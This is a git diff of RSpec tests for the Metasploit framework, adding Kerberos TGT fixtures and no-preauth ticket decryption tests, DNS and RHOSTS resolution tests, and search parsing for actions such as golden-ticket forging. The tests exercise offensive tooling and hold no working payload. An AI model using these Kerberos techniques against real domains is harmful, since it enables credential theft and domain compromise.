+ "\x41\x4e\xa2\x1d\x30\x1b\xa0\x03\x02\x01\x02\xa1\x14\x30\x12\x1b" \
+ "\x06\x6b\x72\x62\x74\x67\x74\x1b\x08\x50\x4f\x44\x38\x2e\x4c\x41" \
+ "\x4e\xa3\x82\x03\xcd\x30\x82\x03\xc9\xa0\x03\x02\x01\x12\xa1\x03" \
+ "\x02\x01\x02\xa2\x82\x03\xbb\x04\x82\x03\xb7\x99\x95\xd9\xec\xba" \
+ "\x54\xd8\x84\x21\x1c\x22\x9a\x14\x2c\xab\xa9\x8f\xfd\xb0\x5f\x43" \
+ "\xa6\x7b\xb7\x8c\xfb\x82\x58\x62\xcb\x4d\xc7\xda\x7a\x18\x95\x89" \
+ "\x14\x41\xa1\xd0\x8c\xd7\xc0\x8d\x3f\x86\xd6\x50\x7e\xf7\x43\x76" \
+ "\x19\x9f\x6d\x77\x10\xe1\xf7\x1f\x63\xf1\xf8\x87\x05\x7d\x97\xc0" \
+ "\xda\x5c\xf4\x6f\x8c\x02\x16\xd2\x85\x12\x24\x50\x1d\x69\x93\x07" \
+ "\x35\x32\x9f\x7b\xb3\xc7\x6b\xf5\xdf\xd5\xea\xed\x5b\xa2\x10\x14" \
+ "\x86\xbd\x44\xbd\x4c\x27\x13\xe5\xa1\xf9\xd2\xb8\x07\x0e\xf3\xb8" \
+ "\x7a\x0f\x82\x15\x7a\x5c\x0b\x98\xe5\x32\x9b\x69\x70\x66\xe7\xde" \
+ "\x5e\x3b\x3c\x6d\xd7\xcb\x04\xaa\x39\xe6\x35\xcc\x2e\xd3\x10\x99" \
+ "\xf6\xec\x8a\x9f\xd8\x24\x5f\xce\xc8\x68\x22\xfd\x24\x71\x2c\x23" \
+ "\xce\x84\x3c\xb3\xb0\xc9\x78\x8e\x97\x77\x80\xaf\xde\xc5\x16\x35" \
+ "\x31\xfe\xfe\xec\xb8\x17\x78\x3f\xf3\x06\xe8\x86\x82\xa4\xb8\x97" \
+ "\xe6\x2a\xc5\x54\x08\x7f\x65\x03\xed\x29\xdc\xc8\xf2\xbf\xc2\x58" \
+ "\x7e\xd3\xa5\x97\x22\xec\x40\xd2\x9d\x13\xea\xfb\xe1\xbf\x52\x4f" \
+ "\xac\x9e\x29\x80\x35\xee\xc2\x55\x8a\x04\xdd\x0a\x21\x60\x92\xb8" \
+ "\xc7\x87\xa9\x07\x40\x53\xc0\x15\xde\x07\xdb\xe9\x0a\x78\x7a\xf7" \
+ "\x9a\x1d\x0f\x18\x54\x83\xa1\xb7\xdf\x59\xb2\xb7\x3f\xec\xa4\x1a" \
+ "\xd5\x1e\x79\x8e\xec\xfa\xda\x5d\x46\x7c\x49\x14\x61\xdb\xa3\x77" \
+ "\x66\xde\x4f\x5b\x5f\x36\xbf\xc8\x75\xd5\x06\xb4\xf9\x38\x0f\xa2" \
+ "\x06\xed\x12\x53\x7f\x34\x79\x45\x4f\x95\x10\xe7\x17\x8b\x13\x1f" \
+ "\x81\x77\xe4\xcb\x1e\x46\xfb\x6f\x57\xbc\x37\x53\x2a\xa2\xf4\xec" \
+ "\x0e\xa1\x02\xaa\x35\xbc\x66\xc0\xcd\x65\x12\x9d\xd2\xfe\xae\xd5" \
+ "\xa5\x8e\x10\x34\x6d\x6e\x87\x31\xfd\xb5\xa4\x6d\x60\x35\x90\x10" \
+ "\x0b\x2c\x76\x17\x51\x44\x72\x5d\x2d\x47\x4e\xfa\x63\x96\x70\x31" \
+ "\x6e\xef\x6a\xfb\x47\xd2\x46\x23\x6c\x92\xc6\x1d\x3b\xfc\x79\x66" \
+ "\xde\xb9\xba\x63\x2f\x53\x26\xa4\x9a\x91\x53\xa3\xd4\x76\x2f\x86" \
+ "\xf4\x31\xa2\x50\xca\x6f\x30\x01\x87\xf3\x35\x63\xe4\x16\x00\x56" \
+ "\xf4\x64\x80\xc2\x90\x7b\x14\x5a\x6a\x6c\x85\x75\x6d\x74\x5e\x90" \
+ "\xbf\xc6\x7a\x63\xee\xca\x46\x12\x67\x04\x99\xd9\xc2\xca\x3f\x99" \
+ "\x2c\x65\x72\x5a\x15\x13\x7e\x61\x33\x05\x0f\xac\x49\xb1\x38\x8c" \
+ "\x20\xd9\x56\x34\x93\x89\x6d\x65\xd7\x40\x1a\x68\x37\xb8\x6f\x2f" \
+ "\xf2\x6d\xa0\xd3\x0b\x20\x7c\x9d\x91\xb0\x47\x8c\xca\xc8\xd6\x8b" \
+ "\x23\x13\xb3\x13\x12\x5e\x98\x6f\x69\x6a\x6f\x26\x8e\xb8\x4d\x85" \
+ "\x8c\x9e\x76\x12\x31\xdb\x21\xe4\xcb\x90\xdf\xbc\xfb\x0d\xef\xb5" \
+ "\xc5\x01\xd2\x4b\x4f\x40\x8c\x8f\x99\x20\x60\x30\xcc\xad\xa6\x2c" \
+ "\x58\xc2\xa8\x10\x99\x80\xb9\x0a\xa1\x3f\x0a\xf6\x8a\x3a\x54\x6a" \
+ "\xfa\x4f\x47\xf5\x0c\x9d\x56\xcf\x90\x43\x8a\x65\xd3\x93\xfc\x76" \
+ "\x1b\x92\xd7\x05\x78\x6f\xda\x70\x2d\x70\xdf\x05\xa7\xd4\x6f\xd9" \
+ "\xd6\x8a\x99\x95\x06\xe0\xf0\x6d\x52\xe0\xd8\x36\x9f\xa4\x1f\xee" \
+ "\x84\x05\xf2\x0f\xc7\x70\xba\x8b\x61\xf8\xe2\x33\xe2\x7a\x96\x5e" \
+ "\x14\xbc\x7f\x49\xe7\x4e\x97\x7e\x9a\x70\x96\xc0\xf6\xcb\x6f\x5d" \
+ "\x06\x22\x31\x06\x4d\xdf\xdc\xe8\x77\x91\x88\x06\x87\xf6\x3c\x47" \
+ "\x92\xca\xe9\x87\x38\x3d\xaf\x40\x33\x3c\xd6\xdd\x35\x8d\x12\x24" \
+ "\x35\xc3\xf0\xa5\x9e\x8b\xa4\xe1\x94\x27\x55\x10\x59\x3c\xcb\x1e" \
+ "\x35\x10\xb4\x10\x6d\xf3\x17\xf7\xea\x5e\x31\x55\xd1\x4c\x9e\xd1" \
+ "\xde\x08\x61\xce\xcb\x94\xcc\x3f\x86\x65\x99\x21\x5c\x96\x33\x22" \
+ "\x9e\xc5\x6d\x0a\xf5\x28\x63\x0d\x9c\xbd\x32\x41\x81\x2d\x46\xdd" \
+ "\xf6\x00\x5c\x88\x62\x15\x87\x13\x60\xd1\xa1\x6a\x67\xbc\x45\x71" \
+ "\x38\xec\xba\x78\xf6\xd0\x1f\x32\x21\x37\x79\x60\xc7\x48\xb7\xe0" \
+ "\x9c\x55\x65\x73\xe6\x3b\x5d\x6a\xf0\xf8\x6f\x38\x41\xe5\x8b\xde" \
+ "\xa2\x62\x57\x1b\x33\x0d\x00\xa2\xec\x18\x6f\x2e\xfc\x46\xa4\x49" \
+ "\xdd\x5a\x5e\x7a\x6d\xfb\x96\xfe\x74\x22\xd7\x57\x3c\x00\x31\x1c" \
+ "\x56\x6e\xae\xa9\x15\x45\x54\xec\x8e\xef\x32\x01\xb8\xf8\x41\xff" \
+ "\x9f\x4c\x21\x68\xa4\x22\xb7\x36\x7c\x68\x68\x05\x50\x1a\xd7\xf4" \
+ "\xd6\x33\x6f\xcb\x53\x5e\x87\x38\x4e\x76\x81\x77\x98\x50\x5c\xa2" \
+ "\xf4\x34\x88\x81\xdb\x43\x9a\x2f\x60\x9b\xe1\xb9\x3c\x87\xf5\x3c" \
+ "\x7a\x7e\x97\x1f\x53\x69\x02\x0e\x67\x97\xdb\x05\x42\x38\x35\x71" \
+ "\x51\x2d\xa4\xb8\x04\x1c\x44\xeb\x8d\x81\xc1\xd7\xcf\x25\x39\x86" \
+ "\x03\xc1\x74\x98\x01\x8e\x2c\x16\xa3\x99\xdf\x38\xa0\xcd\xf9\x8f" \
+ "\xe0\x98\xa6\x82\x01\x31\x30\x82\x01\x2d\xa0\x03\x02\x01\x12\xa1" \
+ "\x03\x02\x01\x04\xa2\x82\x01\x1f\x04\x82\x01\x1b\xb3\x98\xdd\x38" \
+ "\x7b\xd0\xae\xe1\xf3\x76\x0f\xa8\x3c\x2a\x9b\x85\xb0\x7d\x64\xf3" \
+ "\xb1\xd9\x78\xf3\x28\x05\xc7\x3f\xb4\x09\xcc\xdc\x6e\x4c\xdd\xc9" \
+ "\xf8\xc9\x7a\x19\xa3\xda\x86\xc9\x15\x1d\x95\x8b\x90\x05\x8e\x1e" \
+ "\x73\xca\xa1\x1c\xfa\x86\x10\x01\x2d\x5d\x29\x0c\x03\x3e\x67\xaa" \
+ "\xf6\xc9\xde\xf9\x7a\xd7\xa2\x4e\xb3\x25\xb3\x57\x26\xfc\x44\x92" \
+ "\x04\x08\xd1\x59\x50\x36\x0e\x2a\xd7\xbc\x26\x95\xcd\xda\xce\x87" \
+ "\x32\x2c\x20\x69\xfb\x34\x94\x25\xe2\x33\x5f\xea\xb1\x37\xff\x7f" \
+ "\x23\xf2\x7f\x26\x02\x08\x51\x55\xe5\x24\x4b\x01\x2e\x62\xcc\x98" \
+ "\xd6\x2f\x0e\x5d\x50\x8a\x78\xe0\x87\xa0\x46\xa3\x5f\x01\x36\x61" \
+ "\x65\xa9\x78\x21\x0f\xe8\x26\x1a\x12\xdd\xb7\x1a\x08\x3a\xcc\x0a" \
+ "\xc9\xb4\x92\x2f\x5c\xe1\x1b\x4a\xaf\x07\x33\xe1\x5f\xf3\xc9\x5e" \
+ "\xc5\x0d\xff\x79\x7b\x84\x9d\x82\x60\xf8\x12\x13\x3e\xf1\xea\xf7" \
+ "\xe5\x0d\xf2\xe0\x83\x1c\x16\xf7\x61\x3b\x6d\x66\xc1\xbf\x60\x32" \
+ "\x71\xdd\x4e\xcf\x77\x92\xc1\xc4\xa0\x88\x1b\x5f\x30\x22\x3b\x31" \
+ "\x3a\x12\x35\xd2\x8b\x12\x51\x26\x12\x75\xab\x8e\xfd\x5a\xfe\x6c" \
+ "\xe6\x26\x60\xa4\xfd\x06\xd0\x81\x8d\x68\x5f\x59\x43\x0f\x6b\xdd" \
+ "\x6d\x91\xd1\x15\x32\xd3\x13\xc1\x2b\xb3\xec\x5b\x52\xee\x8d\x2d" \
+ "\x8e\x25\x3c\xea\x30\xe6\x09"
+ )
+ end
+
# Success - no error
let(:as_rep_success) do
decode_kerb_response(
@@ -409,24 +505,95 @@ RSpec.describe Msf::Exploit::Remote::Kerberos::Client do
context 'when kerberos preauth is not required' do
let(:mock_kerberos_responses) do
- [as_rep_success]
+ [as_rep_success_preauth]
end
it 'returns the ticket' do
res = subject.send_request_tgt(
- server_name: 'krbtgt/DEMO.local',
- client_name: 'basic_user',
+ server_name: 'krbtgt/POD8.lan',
+ client_name: 'no.preauth',
password: nil,
- realm: 'DEMO.local'
+ realm: 'POD8.lan'
)
- expect(res.ticket.realm).to eq('DEMO.LOCAL')
- expect(res.ticket.sname.name_string).to eq(['krbtgt', 'DEMO.LOCAL'])
+ expect(res.ticket.realm).to eq('POD8.LAN')
+ expect(res.ticket.sname.name_string).to eq(['krbtgt', 'POD8.LAN'])
expect(res.preauth_required).to be false
expect(res.decrypted_part).to be_nil
expect(res.krb_enc_key).to be_nil
expect(mock_client).to have_received(:send_recv).once
end
+
+ it 'decrypts the ticket when the password is correct' do
+ res = subject.send_request_tgt(
+ server_name: 'krbtgt/POD8.lan',
+ client_name: 'no.preauth',
+ password: 'Password123!',
+ realm: 'POD8.lan'
+ )
+
+ expect(res.ticket.realm).to eq('POD8.LAN')
+ expect(res.ticket.sname.name_string).to eq(['krbtgt', 'POD8.LAN'])
+ expect(res.preauth_required).to be false
+ expect(res.decrypted_part.sname.name_string).to eq(['krbtgt','POD8.LAN']) # This verifies it decrypts
+ expect(res.krb_enc_key[:enctype]).to eq(Rex::Proto::Kerberos::Crypto::Encryption::AES256)
+ expect(mock_client).to have_received(:send_recv).once
+ end
+
+ it 'decrypts the ticket when the key is correct' do
+ enc_key = Rex::Proto::Kerberos::Crypto::Aes256CtsSha1.new.string_to_key('Password123!', 'POD8.LANno.preauth')
+ res = subject.send_request_tgt(
+ server_name: 'krbtgt/POD8.lan',
+ client_name: 'no.preauth',
+ offered_etypes: [Rex::Proto::Kerberos::Crypto::Encryption::AES256],
+ password: nil,
+ key: enc_key,
+ realm: 'POD8.lan'
+ )
+
+ expect(res.ticket.realm).to eq('POD8.LAN')
+ expect(res.ticket.sname.name_string).to eq(['krbtgt', 'POD8.LAN'])
+ expect(res.preauth_required).to be false
+ expect(res.decrypted_part.sname.name_string).to eq(['krbtgt','POD8.LAN']) # This verifies it decrypts
+ expect(res.krb_enc_key[:enctype]).to eq(Rex::Proto::Kerberos::Crypto::Encryption::AES256)
+ expect(mock_client).to have_received(:send_recv).once
+ end
+
+ it 'returns the ticket when the password is incorrect' do
+ res = subject.send_request_tgt(
+ server_name: 'krbtgt/POD8.lan',
+ client_name: 'no.preauth',
+ password: 'wrong password',
+ realm: 'POD8.lan'
+ )
+
+ expect(res.ticket.realm).to eq('POD8.LAN')
+ expect(res.ticket.sname.name_string).to eq(['krbtgt', 'POD8.LAN'])
+ expect(res.preauth_required).to be false
+ expect(res.decrypted_part).to be_nil
+ expect(res.krb_enc_key).to be_nil
+ expect(mock_client).to have_received(:send_recv).once
+ end
+
+ it 'returns the ticket when the key is incorrect' do
+ enc_key = Rex::Proto::Kerberos::Crypto::Aes256CtsSha1.new.string_to_key('wrong password', 'POD8.LANno.preauth')
+ res = subject.send_request_tgt(
+ server_name: 'krbtgt/POD8.lan',
+ client_name: 'no.preauth',
+ offered_etypes: [Rex::Proto::Kerberos::Crypto::Encryption::AES256],
+ password: nil,
+ key: enc_key,
+ realm: 'POD8.lan'
+ )
+
+ expect(res.ticket.realm).to eq('POD8.LAN')
+ expect(res.ticket.sname.name_string).to eq(['krbtgt', 'POD8.LAN'])
+ expect(res.preauth_required).to be false
+ expect(res.decrypted_part).to be_nil
+ expect(res.krb_enc_key).to be_nil
+ expect(mock_client).to have_received(:send_recv).once
+ end
+
end
context 'when kerberos preauth is required' do
diff --git a/spec/lib/msf/core/exploit/remote/kerberos/service_authenticator/base_spec.rb b/spec/lib/msf/core/exploit/remote/kerberos/service_authenticator/base_spec.rb
index d8f2ad72d1..27f78877dc 100644
--- a/spec/lib/msf/core/exploit/remote/kerberos/service_authenticator/base_spec.rb
+++ b/spec/lib/msf/core/exploit/remote/kerberos/service_authenticator/base_spec.rb
@@ -2,18 +2,45 @@
require 'spec_helper'
RSpec.describe Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base do
- subject do
- described_class.new(
+ let(:params) {
+ {
realm: 'demo.local',
hostname: 'mock_hostname',
username: 'mock_username',
password: 'mock_password',
- host: 'mock_host',
+ host: '127.0.0.1',
port: 88,
timeout: 25,
framework: instance_double(::Msf::Framework),
framework_module: instance_double(::Msf::Module)
- )
+ }
+ }
+
+ subject do
+ described_class.new(**params)
+ end
+
+ describe '#connect' do
+ before(:each) do
+ allow(params[:framework_module]).to receive(:framework)
+ allow(params[:framework_module]).to receive(:print_status)
+ allow(params[:framework_module]).to receive(:vprint_status)
+ end
+
+ context 'when host is nil' do
+ it 'resolves it to a hostname' do
+ expect(::Rex::Socket).to receive(:getresources).with("_kerberos._tcp.#{params[:realm]}", :SRV).and_return(['mock_host'])
+ instance = described_class.new(**params.merge(host: nil))
+ instance.connect
+ expect(instance.host).to eq('mock_host')
+ end
+
+ it 'raises a KerberosError on failure' do
+ expect(::Rex::Socket).to receive(:getresources).with("_kerberos._tcp.#{params[:realm]}", :SRV).and_return([])
+ instance = described_class.new(**params.merge(host: nil))
+ expect { instance.connect }.to raise_error(::Rex::Proto::Kerberos::Model::Error::KerberosError)
+ end
+ end
end
describe "#validate_response!" do
@@ -28,6 +55,16 @@ RSpec.describe Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base do
end
end
+ context 'when the response is invalid ASN1' do
+ let(:response) do
+ 'abcd'
+ end
+
+ it 'raises a Kerberos decoding exception' do
+ expect { subject.validate_response!(response) }.to raise_error(::Rex::Proto::Kerberos::Model::Error::KerberosDecodingError, /Invalid GSS/)
+ end
+ end
+
context 'when the response is accept-incomplete and contains a kerberos error' do
let(:response) do
"\xa1\x81\x89\x30\x81\x86\xa0\x03\x0a\x01\x01\xa1\x0b\x06\x09\x2a" \
diff --git a/spec/lib/msf/core/modules/metadata/search_spec.rb b/spec/lib/msf/core/modules/metadata/search_spec.rb
index 36aada404f..3ee442cff6 100644
--- a/spec/lib/msf/core/modules/metadata/search_spec.rb
+++ b/spec/lib/msf/core/modules/metadata/search_spec.rb
@@ -50,6 +50,7 @@ RSpec.describe Msf::Modules::Metadata::Search do
it { expect(described_class.parse_search_string("stage:linux/x64/meterpreter ")).to eq({"stage"=>[["linux/x64/meterpreter"], []]}) }
it { expect(described_class.parse_search_string("stager:linux/x64/reverse_tcp ")).to eq({"stager"=>[["linux/x64/reverse_tcp"], []]}) }
it { expect(described_class.parse_search_string("adapter:cmd/linux/http/mips64 ")).to eq({"adapter"=>[["cmd/linux/http/mips64"], []]}) }
+ it { expect(described_class.parse_search_string("action:forge_golden ")).to eq({"action"=>[["forge_golden"], []]}) }
end
describe '#find' do
@@ -128,6 +129,14 @@ RSpec.describe Msf::Modules::Metadata::Search do
it_should_behave_like 'search_filter', :accept => accept, :reject => reject
end
+ context 'on a module with actions' do
+ let(:opts) { ({ 'actions' => [{ 'name' => 'ACTION_NAME', 'description' => 'ACTION_DESCRIPTION'}] }) }
+ accept = %w(action:action_name action:action_description)
+ reject = %w(action:unrelated)
+
+ it_should_behave_like 'search_filter', :accept => accept, :reject => reject
+ end
+
context 'on a module with the author "joev"' do
let(:opts) { ({ 'author' => ['joev'] }) }
accept = %w(author:joev author:joe)
@@ -305,7 +314,7 @@ RSpec.describe Msf::Modules::Metadata::Search do
REF_TYPES.each do |ref_type|
ref_num = '1234-1111'
- context 'on a module with reference #{ref_type}-#{ref_num}' do
+ context "on a module with reference #{ref_type}-#{ref_num}" do
let(:opts) { ({ 'references' => ["#{ref_type}-#{ref_num}"] }) }
accept = ["#{ref_type.downcase}:#{ref_num}"]
reject = %w(1235-1111 1234-1112 bad).map { |n| "#{ref_type.downcase}:#{n}" }
diff --git a/spec/lib/msf/core/option_container_spec.rb b/spec/lib/msf/core/option_container_spec.rb
index dd055963a2..4fd2b9c09a 100644
--- a/spec/lib/msf/core/option_container_spec.rb
+++ b/spec/lib/msf/core/option_container_spec.rb
@@ -160,7 +160,7 @@ RSpec.describe Msf::OptionContainer do
expect { options_with_rhosts.validate(datastore) }.to raise_error(Msf::OptionValidateError) { |error|
expected_reasons = {
'RHOSTS' => [
- 'unexpected values: http://198.51.100.1:8080path, http://foo:bar@198.51.100.1:8080path'
+ 'Unexpected values: http://198.51.100.1:8080path, http://foo:bar@198.51.100.1:8080path'
]
}
expect(error.options).to eq(['RHOSTS', 'HttpUsername', 'HttpPassword'])
diff --git a/spec/lib/msf/core/rhosts_walker_spec.rb b/spec/lib/msf/core/rhosts_walker_spec.rb
index 4411889698..2133407484 100644
--- a/spec/lib/msf/core/rhosts_walker_spec.rb
+++ b/spec/lib/msf/core/rhosts_walker_spec.rb
@@ -40,12 +40,16 @@ RSpec::Matchers.define :match_errors do |expected|
return false if actual.count != expected.count
expected.zip(actual).all? do |(expected, actual)|
- actual.instance_of?(expected.class) && actual.message == expected.message
+
+ same_message = actual.instance_of?(expected.class) && actual.message == expected.message
+ same_cause = (actual.cause.nil? && expected.cause.nil?) || (actual.cause.class == expected.cause.class)
+
+ same_message && same_cause
end
end
failure_message do |actual|
- "\nexpected:\n#{expected.to_a.join(",\n")}\n\ngot:\n#{actual.to_a.join(",\n")}\n\n(compared using ==)\n"
+ "\nexpected:\n#{expected.to_a.map {|e| "#{e.message} (#{e.cause})"}.join(",\n")}\n\ngot:\n#{actual.to_a.map {|e| "#{e.message} (#{e.cause})"}.join(",\n")}\n\n(compared using ==)\n"
end
failure_message_when_negated do |_actual|
@@ -321,6 +325,9 @@ RSpec.describe Msf::RhostsWalker do
before(:each) do
@temp_files = []
+ allow(::Addrinfo).to receive(:getaddrinfo).with('nonexistent.com', 0, ::Socket::AF_UNSPEC, ::Socket::SOCK_STREAM) do |*_args|
+ []
+ end
allow(::Addrinfo).to receive(:getaddrinfo).with('example.com', 0, ::Socket::AF_UNSPEC, ::Socket::SOCK_STREAM) do |*_args|
[::Addrinfo.new(['AF_INET', 0, 'example.com', '192.0.2.2'])]
end
@@ -420,20 +427,23 @@ RSpec.describe Msf::RhostsWalker do
{ 'expected' => [] },
{ 'RHOSTS' => nil, 'expected' => [] },
{ 'RHOSTS' => '', 'expected' => [] },
- { 'RHOSTS' => '-1', 'expected' => [] },
- { 'RHOSTS' => 'http:', 'expected' => [Msf::RhostsWalker::Error.new('http:')] },
- { 'RHOSTS' => '127.0.0.1 http:', 'expected' => [Msf::RhostsWalker::Error.new('http:')] },
- { 'RHOSTS' => '127.0.0.1 http: 127.0.0.1 https:', 'expected' => [Msf::RhostsWalker::Error.new('http:'), Msf::RhostsWalker::Error.new('https:')] },
+ { 'RHOSTS' => '-1', 'expected' => [Msf::RhostsWalker::Error.new('-1', cause: Msf::RhostsWalker::RhostResolveError.new)] },
+ { 'RHOSTS' => 'http:', 'expected' => [Msf::RhostsWalker::Error.new('http:', cause: Addressable::URI::InvalidURIError.new)] },
+ { 'RHOSTS' => '127.0.0.1 http:', 'expected' => [Msf::RhostsWalker::Error.new('http:', cause: Addressable::URI::InvalidURIError.new)] },
+ { 'RHOSTS' => '127.0.0.1 http: 127.0.0.1 https:', 'expected' => [Msf::RhostsWalker::Error.new('http:', cause: Addressable::URI::InvalidURIError.new), Msf::RhostsWalker::Error.new('https:', cause: Addressable::URI::InvalidURIError.new)] },
# Unknown protocols aren't validated, as there may be potential ambiguity over ipv6 addresses
# which may technically start with a 'schema': AAA:1450:4009:822::2004. The existing rex socket
# range walker will silently drop this value though, and it may be treated as an overall error.
- { 'RHOSTS' => 'unknown_protocol://127.0.0.1 127.0.0.1', 'expected' => [ ] },
+ { 'RHOSTS' => 'unknown_protocol://127.0.0.1 127.0.0.1', 'expected' => [ Msf::RhostsWalker::Error.new('unknown_protocol://127.0.0.1', cause: Msf::RhostsWalker::RhostResolveError.new)] },
# cidr validation
- { 'RHOSTS' => 'cidr:127.0.0.1', 'expected' => [Msf::RhostsWalker::Error.new('cidr:127.0.0.1')] },
- { 'RHOSTS' => 'cidr:abc/127.0.0.1', 'expected' => [Msf::RhostsWalker::Error.new('cidr:abc/127.0.0.1')] },
- { 'RHOSTS' => 'cidr:/1000:127.0.0.1', 'expected' => [Msf::RhostsWalker::Error.new('cidr:/1000:127.0.0.1')] },
- { 'RHOSTS' => 'cidr:%eth2:127.0.0.1', 'expected' => [Msf::RhostsWalker::Error.new('cidr:%eth2:127.0.0.1')] },
+ { 'RHOSTS' => 'cidr:127.0.0.1', 'expected' => [Msf::RhostsWalker::Error.new('cidr:127.0.0.1', cause: Msf::RhostsWalker::InvalidCIDRError.new)] },
+ { 'RHOSTS' => 'cidr:abc/127.0.0.1', 'expected' => [Msf::RhostsWalker::Error.new('cidr:abc/127.0.0.1', cause: Msf::RhostsWalker::InvalidCIDRError.new)] },
+ { 'RHOSTS' => 'cidr:/1000:127.0.0.1', 'expected' => [Msf::RhostsWalker::Error.new('cidr:/1000:127.0.0.1', cause: Msf::RhostsWalker::InvalidCIDRError.new)] },
+ { 'RHOSTS' => 'cidr:%eth2:127.0.0.1', 'expected' => [Msf::RhostsWalker::Error.new('cidr:%eth2:127.0.0.1', cause: Msf::RhostsWalker::InvalidCIDRError.new)] },
+
+ # host resolution
+ { 'RHOSTS' => 'https://nonexistent.com:9000/foo', 'expected' => [Msf::RhostsWalker::Error.new('https://nonexistent.com:9000/foo', cause: Msf::RhostsWalker::RhostResolveError.new)] },
].each do |test|
it "handles the input #{test['RHOSTS'].inspect} as having the errors #{test['expected']}" do
aux_mod.datastore['RHOSTS'] = test['RHOSTS']
diff --git a/spec/lib/msf/ui/console/table_print/rank_formatter_spec.rb b/spec/lib/msf/ui/console/table_print/rank_formatter_spec.rb
index 01763eaa8b..fcf8717a7e 100644
--- a/spec/lib/msf/ui/console/table_print/rank_formatter_spec.rb
+++ b/spec/lib/msf/ui/console/table_print/rank_formatter_spec.rb
@@ -20,6 +20,9 @@ RSpec.describe Msf::Ui::Console::TablePrint::RankFormatter do
expect(formatter.format(42)).to eql 42
expect(formatter.format([])).to eql []
expect(formatter.format({})).to eql Hash.new
+ expect(formatter.format(nil)).to eql nil
+ expect(formatter.format('')).to eql ''
+ expect(formatter.format('.')).to eql '.'
end
end
end
diff --git a/spec/lib/rex/post/meterpreter/ui/console/command_dispatcher/core_spec.rb b/spec/lib/rex/post/meterpreter/ui/console/command_dispatcher/core_spec.rb
new file mode 100644
index 0000000000..ad56045b33
--- /dev/null
+++ b/spec/lib/rex/post/meterpreter/ui/console/command_dispatcher/core_spec.rb
@@ -0,0 +1,25 @@
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'rex/post/meterpreter/ui/console/command_dispatcher/core'
+
+RSpec.describe Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Core do
+ let(:session) { instance_double(Msf::Sessions::Meterpreter) }
+ # A meterpreter session *is* a client but for the smb session it *has* a (ruby smb) client
+ let(:client) { session }
+ let(:console) do
+ console = Rex::Post::Meterpreter::Ui::Console.new(session)
+ console.disable_output = true
+ console
+ end
+
+ before(:each) do
+ allow(session).to receive(:console).and_return(console)
+ allow(session).to receive(:name).and_return('test client name')
+ allow(session).to receive(:sid).and_return('test client sid')
+ end
+
+ subject(:command_dispatcher) { described_class.new(session.console) }
+
+ it_behaves_like 'session command dispatcher'
+end
diff --git a/spec/lib/rex/post/smb/ui/console/command_dispatcher/core_spec.rb b/spec/lib/rex/post/smb/ui/console/command_dispatcher/core_spec.rb
new file mode 100644
index 0000000000..5860974dbd
--- /dev/null
+++ b/spec/lib/rex/post/smb/ui/console/command_dispatcher/core_spec.rb
@@ -0,0 +1,25 @@
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'rex/post/smb/ui/console/command_dispatcher/core'
+
+RSpec.describe Rex::Post::SMB::Ui::Console::CommandDispatcher::Core do
+ let(:client) { instance_double(RubySMB::Client) }
+ let(:session) { Msf::Sessions::SMB.new(nil, { client: client }) }
+ let(:console) do
+ console = Rex::Post::SMB::Ui::Console.new(session)
+ console.disable_output = true
+ console
+ end
+
+ before(:each) do
+ allow(session).to receive(:client).and_return(client)
+ allow(session).to receive(:console).and_return(console)
+ allow(session).to receive(:name).and_return('test client name')
+ allow(session).to receive(:sid).and_return('test client sid')
+ end
+
+ subject(:command_dispatcher) { described_class.new(session.console) }
+
+ it_behaves_like 'session command dispatcher'
+end
diff --git a/spec/lib/rex/proto/dns/custom_nameserver_provider_spec.rb b/spec/lib/rex/proto/dns/custom_nameserver_provider_spec.rb
new file mode 100755
index 0000000000..89313095c3
--- /dev/null
+++ b/spec/lib/rex/proto/dns/custom_nameserver_provider_spec.rb
@@ -0,0 +1,142 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+require 'net/dns'
+
+
+RSpec.describe Rex::Proto::DNS::CustomNameserverProvider do
+ def packet_for(name)
+ packet = Net::DNS::Packet.new(name, Net::DNS::A, Net::DNS::IN)
+ Rex::Proto::DNS::Packet.encode_drb(packet)
+ end
+
+ let(:base_nameserver) do
+ '1.2.3.4'
+ end
+
+ let(:ruleless_nameserver) do
+ '1.2.3.5'
+ end
+
+ let(:ruled_nameserver) do
+ '1.2.3.6'
+ end
+
+ let(:ruled_nameserver2) do
+ '1.2.3.7'
+ end
+
+ let(:ruled_nameserver3) do
+ '1.2.3.8'
+ end
+
+ let (:config) do
+ {:dns_cache_no_start => true}
+ end
+
+ let (:framework_with_dns_enabled) do
+ framework = Object.new
+ def framework.features
+ f = Object.new
+ def f.enabled?(_name)
+ true
+ end
+
+ f
+ end
+
+ framework
+ end
+
+ subject(:many_ruled_provider) do
+ dns_resolver = Rex::Proto::DNS::CachedResolver.new(config)
+ dns_resolver.extend(Rex::Proto::DNS::CustomNameserverProvider)
+ dns_resolver.nameservers = [base_nameserver]
+ dns_resolver.add_nameserver([], ruleless_nameserver, nil)
+ dns_resolver.add_nameserver(['*.metasploit.com'], ruled_nameserver, nil)
+ dns_resolver.add_nameserver(['*.metasploit.com'], ruled_nameserver2, nil)
+ dns_resolver.add_nameserver(['*.notmetasploit.com'], ruled_nameserver3, nil)
+ dns_resolver.set_framework(framework_with_dns_enabled)
+
+ dns_resolver
+ end
+
+ subject(:ruled_provider) do
+ dns_resolver = Rex::Proto::DNS::CachedResolver.new(config)
+ dns_resolver.extend(Rex::Proto::DNS::CustomNameserverProvider)
+ dns_resolver.nameservers = [base_nameserver]
+ dns_resolver.add_nameserver([], ruleless_nameserver, nil)
+ dns_resolver.add_nameserver(['*.metasploit.com'], ruled_nameserver, nil)
+ dns_resolver.set_framework(framework_with_dns_enabled)
+
+ dns_resolver
+ end
+
+ subject(:ruleless_provider) do
+ dns_resolver = Rex::Proto::DNS::CachedResolver.new(config)
+ dns_resolver.extend(Rex::Proto::DNS::CustomNameserverProvider)
+ dns_resolver.nameservers = [base_nameserver]
+ dns_resolver.add_nameserver([], ruleless_nameserver, nil)
+ dns_resolver.set_framework(framework_with_dns_enabled)
+
+ dns_resolver
+ end
+
+ subject(:empty_provider) do
+ dns_resolver = Rex::Proto::DNS::CachedResolver.new(config)
+ dns_resolver.extend(Rex::Proto::DNS::CustomNameserverProvider)
+ dns_resolver.nameservers = [base_nameserver]
+ dns_resolver.set_framework(framework_with_dns_enabled)
+
+ dns_resolver
+ end
+
+ context 'When no nameserver is configured' do
+ it 'The resolver base is returned' do
